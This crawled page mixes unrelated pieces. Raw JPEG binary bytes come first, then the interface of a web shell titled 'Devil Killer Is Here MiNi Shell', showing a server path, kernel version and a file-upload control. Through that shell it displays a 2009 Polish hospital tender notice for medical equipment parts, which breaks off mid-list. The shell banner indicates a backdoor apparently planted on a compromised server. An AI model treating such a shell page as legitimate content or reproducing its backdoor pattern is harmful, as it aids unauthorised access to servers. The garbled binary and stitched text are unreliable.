JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/366908-N-2009.html

<p class="kh_header"><b>Bytom: PRZETARG NIEOGRANICZONY NA DOSTAWĘ SPECJALISTYCZNYCH WYROBÓW MEDYCZNYCH</b><br>
<b>Numer ogłoszenia: 366908 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY NA DOSTAWĘ SPECJALISTYCZNYCH WYROBÓW MEDYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w przetargu nieograniczonym jest dostawa specjalistycznych wyrobów medycznych określonych przez Zamawiającego według grup asortymentowo                   - cenowych  zgrupowanych  w  Pakietach  nr 1 - 22 stanowiących załącznik A                           do specyfikacji istotnych warunków zamówienia :

Pakiet Nr 	1	 NARZĘDZIA RÓŻNE ORTOPEDYCZNE
Pakiet Nr 	2	OPRZYRZĄDOWANIE DO INKUBATORA TYPU OHIO CARE PLUS
Pakiet Nr 	3	OPRZYRZĄDOWANIE DO INKUBATORA TYPU ATOM
Pakiet Nr 	4	OPRZYRZĄDOWANIE DO INKUBATORA AMELETTE I AMECORE PRODUKCJI AMEDA
Pakiet Nr 	5	OPRZYRZĄDOWANIE DO RESPIRATORA BABYLOG 8000 FIRMY DRAGER II 
Pakiet Nr 	6	PRZESŁONY OKIENEK DO INKUBATORÓW 
Pakiet Nr 	7	OPRZYRZĄDOWANIE DO KARDIOMONITORA INFINITY DELTA
Pakiet Nr 	8	OPRZYRZĄDOWANIE DO PRZEZSKÓRNEGO MONITOROWANIA GAZÓW WE KRWI DO KARDIOMONITORA INFINITY DELTA
Pakiet Nr 	9	OPRZYRZĄDOWANIE DO CPAP BABY FLOW DO RESPIRATORA BABYLOG 8000 FILTR DRAGER
Pakiet Nr 	10	 KANIULE DONOSOWE DO CPAP
Pakiet Nr 	11	OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA OHMEDA EXELL AESTIVA 5
Pakiet Nr 	12	OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA SULLA 808 909
Pakiet Nr 	13	OPRZYRZĄDOWANIE DO APARATU DO ZNIECZULENIA DAMECA
Pakiet Nr 	14	USZCZELKI DO TROAKARÓW FIRMY STORZ
Pakiet Nr 	15	OPRZYRZĄDOWANIE DO  ERO-SCAN  FIRMY OTICON
Pakiet Nr 	16	OPRZYRZĄDOWANIE DO DIATERMII WERSAPOINT
Pakiet Nr 	17	FILTR POWIETRZA DO SSAKA ELEKTYCZNEGO
Pakiet Nr 	18	CZĘŚCI DO ZAMYKANIA BUTELEK Z ROZTWOREM FORMALINY DO STERYLIZATORA TYPU FORMOMAT
Pakiet Nr 	19	POJEMNIK DO CZYSZCZENIA IGIEŁ CHIRURGICZNYCH
Pakiet Nr 	20	OPRZYRZĄDOWANIE DO BRONCHOSKOPU BF 20 D
Pakiet Nr 	21	SPRZĘT DO PRZETACZANIA PŁYNÓW 
Pakiet Nr 	22	PROBÓWKI DO MIKROMETODY DO BADAŃ BIOCHEMICZNYCH.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.16.99.00-2, 33.15.20.00-0, 33.17.12.00-1, 33.12.32.10-3, 33.17.20.00-6, 33.17.12.00-1, 33.15.78.10-6, 33.17.10.00-9, 25.12.22.20-0, 33.15.82.00-4, 33.16.10.00-6, 33.14.17.00-7, 33.19.10.00-5, 33.19.10.00-5, 33.16.80.00-5, 33.19.41.00-7, 33.14.13.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> w przypadku złożenia oferty na wszystkie pakiety wadium w wysokości 4 256,50  zł. (słownie: cztery tysiące dwieście  pięćdziesiąt sześć zł pięćdziesiąt  gr. ),
w przypadku złożenia oferty na : 
	pakiet nr 1  wadium w wysokości 161,00 zł ( słownie : sto sześćdziesiąt jeden zł ),
	pakiet nr 2  wadium w wysokości 3,00 zł ( słownie : trzy zł ),
	pakiet nr 3  wadium w wysokości 852,00 zł ( słownie : osiemset pięćdziesiąt dwa zł ),
	pakiet nr 4  wadium w wysokości 602,00 zł  ( słownie : sześćset dwa zł ),
	pakiet nr 5  wadium w wysokości 85,00 zł ( słownie : osiemdziesiąt pięć złotych ),
	pakiet nr 6  wadium w wysokości 4,50 zł ( słownie : cztery zł pięćdziesiąt gr. ),
	pakiet nr 7  wadium w wysokości 418,00 zł ( słownie : czterysta osiemnaście zł ),
	pakiet nr 8  wadium w wysokości 262,00 zł ( słownie : dwieście sześćdziesiąt dwa zł)
	pakiet nr 9 wadium w wysokości 1310,00 zł ( słownie : jeden tysiąc trzysta dziesięć zł) ,
	pakiet nr 10 wadium w wysokości 10,00 zł ( słownie : dziesięć  złotych ),
	pakiet nr 11  wadium w wysokości 78,00 zł ( słownie : siedemdziesiąt osiem złotych ),
	pakiet nr 12  wadium w wysokości 130,00 zł ( słownie : sto trzydzieści złotych ),
	pakiet nr 13  wadium w wysokości 8,00 zł ( słownie : osiem zł ),
	pakiet nr 14  wadium w wysokości 9,00 zł ( słownie : dziewięć  zł ),
	pakiet nr 15 wadium w wysokości 9,00 zł ( słownie : dziewięć zł ),
	pakiet nr 16  wadium w wysokości 108,00 zł ( słownie : sto osiem zł )
	pakiet nr 17  wadium w wysokości 2,00 zł ( słownie : dwa  zł )
	pakiet nr 18 wadium w wysokości 105,00 zł ( słownie : sto pięć  zł )
	pakiet nr 19 wadium w wysokości 60,00 zł ( słownie : sześćdziesiąt  zł )
	pakiet nr 20  wadium w wysokości 10,00 zł ( słownie : dziesięć zł )
	pakiet nr 21  wadium w wysokości 11,00 zł ( słownie : jedenaście  zł )
	pakiet nr 22 wadium w wysokości 19,00 zł ( słownie : dziewiętnaście zł )<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone                                  w art. 22 ustawy - prawo zamówień publicznych  tzn. że:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności                  (art. 22 ust 1 pkt 1 pzp), tj.: są uprawnieni do występowania w obrocie prawnym                           i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie będące załącznikiem nr 3 do SIWZ oraz dokumenty określone w § 18 ust. 1 SIWZ
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust 1 pkt 2 pzp) .tj.: zrealizowali min. 2 dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia. Za jedną dostawę spełniającą powyższe wymogi                               ( odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia ) Zamawiający uzna dostawę wyrobów medycznych ( sprzętu medycznego ), na kwotę nie mniejszą 
niż wartość brutto złożonej oferty każda, , zapewni termin dostawy przedmiotu zamówienia nie dłuższy niż 5 dni roboczych po dokonaniu zamówienia przez upoważnionego pracownika Zamawiającego - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust 1 pkt 3 pzp), tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową zapewniającą wykonanie zamówienia przy założeniu, że zapłata za zrealizowane zamówienie nastąpi w terminie 30 dni od daty dostawy                        i równoczesnego otrzymania faktury, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 3 SIWZ
d)	nie podlegają wykluczeniu na podstawie art. 22 ust 1 pkt 4 pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3       do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca ubiegający się o zamówienie publiczne posiada uprawnienia do wykonywania działalności będącej przedmiotem zamówienia oraz, 
że nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający wymaga :

a)	Aktualnego - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru                          lub zgłoszenia do ewidencji działalności gospodarczej - oryginał lub kopia poświadczona       za zgodność z oryginałem przez podmiot upoważniony do reprezentowania Wykonawcy.
b)	W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa w pkt  a, aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości  lub jeśli w kraju pochodzenia osoby lub 
w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się 
ww dokumentu - dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego 
lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania.
c)	Aktualnego - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń,  że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - oryginał  lub kopia poświadczona za zgodność z oryginałem przez podmiot upoważniony do reprezentowania Wykonawcy.
d)	W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa  w pkt c,  aktualne  dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu lub jeśli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się ww dokumentu - dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2.	W celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający wymaga :
a)	Wykazu wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego załącznik nr 5 do SIWZ ( Doświadczenie zawodowe )
b)	Dokumentów (np. referencje lub protokoły ) poprzednich zamawiających potwierdzające,                      że dostawy  te zostały wykonane należycie 
c)	Oświadczenia dotyczącego terminu dostawy będącego załącznikiem nr 6 do SIWZ
3.	W celu potwierdzenia , że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga złożenia oświadczenia będącego załącznikiem nr 3 do SIWZ oraz oświadczenia dotyczącego stałości cen oraz warunków płatności będącego załącznikiem 4 do SIWZ ( Warunki płatności )
4.	Wymagania dodatkowe, gdy kilka podmiotów składa wspólnie ofertę:

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w tym przypadku ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.
2)	W przypadku, o którym mowa w pkt 1) Wykonawcy ustanawiają pełnomocnika                         do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania ich  w postępowaniu i w zawarciu umowy w spawie zamówienia publicznego.
3)	W przypadku , kiedy ofertę składa kilku Wykonawców wspólnie, oferta oraz wszystkie załączniki muszą być podpisane przez pełnomocnika ustanowionego przez tych Wykonawców.
4)	W przypadku, kiedy kilku wykonawców składa ofertę wspólnie, do oferty należy załączyć :
a)	Dokumenty Wymienione w  § 18 ust. 1 wystawione indywidualnie dla każdego                 z wykonawców
b)	Wspólny formularz ofertowy oraz pozostałe załączniki o których mowa w § 18 ust. 2  i 3                 podpisany przez ustanowionego pełnomocnika 
c)	Zakres uczestnictwa każdego z Wykonawców składających ofertę wspólną w realizacji zadania,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital specjalistyczny numer 2 Bytom, ul.St.Batorego 15 , 41-902 Bytom, Sekcja Zamówień Publicznych  w cenie 24,40 zł lub bezpłatnie ze strony internetowej zamawiajacego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2009 godzina 09:00, miejsce: Szpital specjalistyczny numer 2 Bytom, ul.St.Batorego 15 , 41-902 Bytom, BLOK NUMER 2 ( budynek dyrekcji ) , pokój numer 2 ( Kancelaria Główna ).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 01.12.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym                    w Specyfikacji Istotnych Warunków Zamówienia Zamawiający wymaga złożenia :
a)	Wypełnionych i podpisanych formularzy asortymentowo - cenowych stanowiących  załącznik A do SIWZ ( dla każdego oferowanego pakietu).
b)	Dokumentów dopuszczających do obrotu ( wpis do rejestru, świadectwo dopuszczenia, pozwolenie na dopuszczenie do obrotu, CE ).</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1- NARZĘDZIA RÓŻNE ORTOPEDYCZNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Piłka oscylacyjna do głowicy GB 125 firmy Aesculap szerokość 25 mm dł. od 90 mm			1	szt
2.	Piłka oscylacyjna do głowicy GB 125 firmy Aesculap szerokość 30 mm dł. od 90 mm			2	szt
3.	Osłonka na wiertarke Elan firmy Aesculap z tkaniny odpornej na wysoką temperaturę z metalowymi napami i otworem na koszyk narzędziowy z możliwością sterylizacji			1	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.99.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2- OPRZYRZĄDOWANIE DO INKUBATORA TYPU OHIO CARE PLUS.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtr powietrza rozmiar 17 cm x 32 cm, 			4	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - OPRZYRZĄDOWANIE DO INKUBATORA TYPU ATOM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czujnik temperatury centralnej dziecka zółty szt 20			20	szt.
2	Filtr powietrza rozmiar 23x15,5 cm 			4	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4  -  OPRZYRZĄDOWANIE DO INKUBATORA AMELETTE I AMECORE PRODUKCJI AMEDA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier do filtrów powietrza rozmiar 95 x 115 mm, 1 opak. a 50 szt			20	op.
2.	Mata do odprowadnika rozmiar 22 cm x 38 cm , 1 opak a 10 szt			5	op.
3.	Rękaw węża do inkubatora			30	szt.
4.	Butelki do ssaka			10	szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5  - OPRZYRZĄDOWANIE DO RESPIRATORA BABYLOG 8000 FIRMY DRAGER II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łącznik Y wielorazowy do układu oddechowego do Babylog 8000			4	szt
2.	Czujnik tlenu 			1	szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 - PRZESŁONY OKIENEK DO INKUBATORÓW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przesłony okienek typu Irys, 1 opak a 4 szt			6	op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr  7 - OPRZYRZĄDOWANIE DO KARDIOMONITORA INFINITY DELTA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czujnik do pomiaru SPO2 typu Y neonatologiczny wielorazowy			5	szt
2	Czujnik do pomiaru SPO2 typu Y neonatologiczny jednorazowy opakowanie a 20 szt			1	opak.
3	Czujnik capnostad do monitorowania etCO2 (końcowo wydechowe CO2) do pomiaru poziomu dwutlenku węgla w drogach oddechowych przy końcu wydechu dla noworodków zaintubowanych op. A 25 szt			1	opak.
4	Czujnik capnostad do monitorowania etCO2 (końcowo wydechowe CO2) do pomiaru poziomu dwutlenku węgla w drogach oddechowych przy końcu wydechu dla noworodków niezaintubowanych op. A 25 szt			1	opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.10-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - OPRZYRZĄDOWANIE DO PRZEZSKÓRNEGO MONITOROWANIA GAZÓW WE KRWI DO KARDIOMONITORA INFINITY DELTA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw montażowy do czujników tp zawierający 100 jednorazowych pierścieni klejących i 4 butelki płynu kontaktowego po 20 ml			2	zest.
2.	Zestaw akcesoriów dla czujnika tp O2 i tp CO2 ściągacz O-ringów i papier czyszczący			3	zest..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 9 - OPRZYRZĄDOWANIE DO CPAP BABY FLOW DO RESPIRATORA BABYLOG 8000 FILTR DRAGER.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kaniule donosowe rozmiar XS opakowanie a 10 szt			7	opak.
2	Kaniule donosowe rozmiar S opakowanie a 10 szt			7	opak.
3	Kaniule donosowe rozmiar M opakowanie a 10 szt			7	opak.
4	Kaniule donosowe rozmiar L opakowanie a 10 szt			3	opak.
5	Kaniule donosowe rozmiar XL opakowanie a 10 szt			3	opak.
6	Maski S opakowanie a 10 szt			7	opak.
7	Maski M opakowanie a 10 szt			7	opak.
8	Opaska na czoło do Baby Flow biała XS			7	szt
9	Pasek wymienny biały XS			7	szt
10	Opaska na czoło do Baby Flow żółta S			20	szt
11	Pasek wymienny żółty S			20	szt
12	Opaska na czoło do Baby Flow czerwona M			20	szt
